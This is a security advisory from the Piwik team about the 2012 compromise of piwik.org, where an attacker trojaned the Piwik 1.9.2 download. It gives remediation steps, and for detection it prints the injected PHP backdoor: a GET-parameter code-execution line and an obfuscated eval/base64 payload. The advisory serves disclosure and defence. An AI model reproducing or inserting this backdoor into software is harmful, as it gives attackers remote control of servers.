Important Security Announcement: Piwik.org webserver got compromised by an attacker on 2012 Nov 26th, this attacker added a malicious code in the Piwik 1.9.2 Zip file for a few hours.

How do I know if my Piwik server is safe?

You would be at risk only if you installed or updated to Piwik 1.9.2 on Nov 26th from 15:43 UTC to 23:59 UTC.
If you are not using 1.9.2, or if you have updated to 1.9.2 earlier than Nov 26th 15:40 UTC or from Nov 27th, you should be safe.

How do I double check if my Piwik server is affected?

To check if your Piwik is affected, open the file piwik/core/Loader.php – a clean file looks like this, where as a compromised Loader.php would contain the following code at the end of the file:

<?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWE$

If you see this malicious code in your piwik/core/Loader.php file, read below to fix this issue.

How do I fix my Piwik if it is compromised?
If you Piwik is compromised, follow these steps:

  1. Backup piwik/config/config.ini.php
  2. DELETE the piwik/ directory
    It is important to DELETE the directory and all piwik files, to ensure any malicious script is deleted as well.
  3. Download latest Piwik from piwik.org
  4. Unzip and Upload the piwik/ directory on your server
  5. Copy the config.ini.php back in /piwik/config/
  6. Go to Piwik, it should display the dashboard as expected

You have now successful restored Piwik to a clean version.

If you have other web softwares running in the same path on your server, we would recommend to be safe and restore a backup of these other softwares as well.

How did the attacker got in piwik.org?

Attacker used a security issue in a WordPress plugin we were using, and gained partial access to the piwik.org server.

Is there a security bug in Piwik software itself?

The website Piwik.org is running WordPress and got compromised, because of a security issue in a WordPress plugin. As far as we know, the Piwik software does not have any exploitable security issue. We have a security bug bounty program in place that rewards researchers for finding security issues in Piwik software, and disclosing them to us. We also document here how you can make your own Piwik data safer and secure your server.

Has any sensitive data been leaked?

Piwik is a self-hosted, open source software. Piwik.org does not track any web analytics data from any Piwik user. No personal or sensitive data has been leaked since we do not track any.

What we are doing to prevent further issues

We are still working with our system administrators on the issue and have some ideas to make this kind of problems much less likely to occur. We will post a follow up once these new mechanisms are in place.

Summary

We would like to thank the Piwik users who quickly reported this problem (by email and in the forums). We received more than five reports in a two hours timeframe, which shows that the Piwik community is very vigilant and ready to react to any problem.

We are truly sorry for the inconvenience. Please be sure that we will do our best to keep Piwik (and Piwik.org) a safe place in the future.

Contact us at security@piwik.org if you need more info.


Piwik Core Team

Piwik is liberating web analytics by offering an open platform with built-in privacy. Piwik is used on more than 1 million websites worldwide and is translated in 53 languages. The Marketplace enables the community to create innovation in the world of web analytics. Roadmap - Get involved.